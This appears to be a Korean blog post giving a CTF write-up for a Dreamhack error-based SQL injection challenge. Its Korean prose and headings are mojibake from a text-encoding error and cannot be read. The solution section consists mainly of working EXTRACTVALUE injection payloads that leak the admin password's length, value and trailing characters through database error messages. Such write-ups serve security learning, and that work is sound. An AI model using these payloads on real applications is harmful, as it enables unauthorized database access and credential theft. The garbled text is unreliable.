๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ

๐Ÿด‍โ˜ ๏ธ CTF ๐Ÿด‍โ˜ ๏ธ/โœˆ๏ธ ์›น โœˆ๏ธ

[Dream Hack - Web] error based sql injection

๋ฐ˜์‘ํ˜•

Error Based SQL Injection

๊ณต๊ฒฉ์ž๊ฐ€ ์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์—์„œ ๋ฐœ์ƒํ•˜๋Š” ์—๋Ÿฌ ๋ฉ”์‹œ์ง€๋ฅผ ์ด์šฉํ•ด ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ๊ตฌ์กฐ๋‚˜ ๋‚ด๋ถ€ ์ •๋ณด๋ฅผ ํš๋“ํ•˜๋Š” ๊ณต๊ฒฉ๊ธฐ๋ฒ•์ด๋‹ค. ๊ณต๊ฒฉ์ž๋Š” SQL ์ฟผ๋ฆฌ์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜๊ณ , ๊ทธ ์—๋Ÿฌ๋ฅผ ๋ถ„์„ํ•˜์—ฌ ์ •๋ณด๋ฅผ ์ถ”์ถœํ•œ๋‹ค.

 

EXTRACTVALUE( {XML ํ˜•์‹์˜ ๊ฐ’}, {XPath ์กฐ๊ฑด์‹} )

ํŠน์ •ํ•œ XPath ์กฐ๊ฑด์‹์„ ๊ธฐ๋ฐ˜์œผ๋กœ XML ๋ฌธ์„œ์—์„œ ๊ฐ’์„ ์ถ”์ถœํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋œ๋‹ค.

- BOOK_XML

<STORE>
	<BOOK> 
		<TITLE>์–ด๋ฆฐ ์™•์ž</TITLE> 
		<AUTHOR>์•™ํˆฌ์•ˆ ๋“œ ์ƒํƒ์ฅํŽ˜๋ฆฌ</AUTHOR> 
		<PRICE>9,800</PRICE> 
	</BOOK> 
</STORE>

 

- ์˜ˆ์‹œ ์ฟผ๋ฆฌ

SELECT EXTRACTVALUE(BOOK_XML, '/STORE/BOOK/TITLE') FROM BOOK_LIST;

 

- ์‹คํ–‰ ๊ฒฐ๊ณผ

์–ด๋ฆฐ์™•์ž

 

ํ’€์ด ๋ฐฉ๋ฒ•

 

flag ๊ธธ์ด ๊ตฌํ•˜๊ธฐ

' or extractvalue(1, concat(0x3a, (select length(upw) from user where uid = 'admin'))) and '1' = '1
:44

 

- ์ถœ๋ ฅํ•˜๊ธฐ

' or extractvalue(1, concat(0x3a, (select upw from user where uid = 'admin'))) and '1' = '1

 

- ๋’ท ๋ถ€๋ถ„ ์ถœ๋ ฅํ•˜๊ธฐ

' or extractvalue(1, concat(0x3a, (select right(upw, 20) from user where uid = 'admin'))) and '1' = '1

 

์ฐธ๊ณ 

[ORACLE] EXTRACTVALUE ํ•จ์ˆ˜, EXTRACT ํ•จ์ˆ˜

๋ฐ˜์‘ํ˜•

'๐Ÿดโ€โ˜ ๏ธ CTF ๐Ÿดโ€โ˜ ๏ธ > โœˆ๏ธ ์›น โœˆ๏ธ' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Dream Hack - Web] sql injection bypass WAF  (0) 2024.08.14
[Dream Hack - Web] csrf-2  (0) 2024.08.07
[Dream Hack - Web] csrf-1  (0) 2024.08.07
[Dream Hack - Web] xss-2  (0) 2024.08.02
[Dream Hack - Web] xss-1  (0) 2024.08.02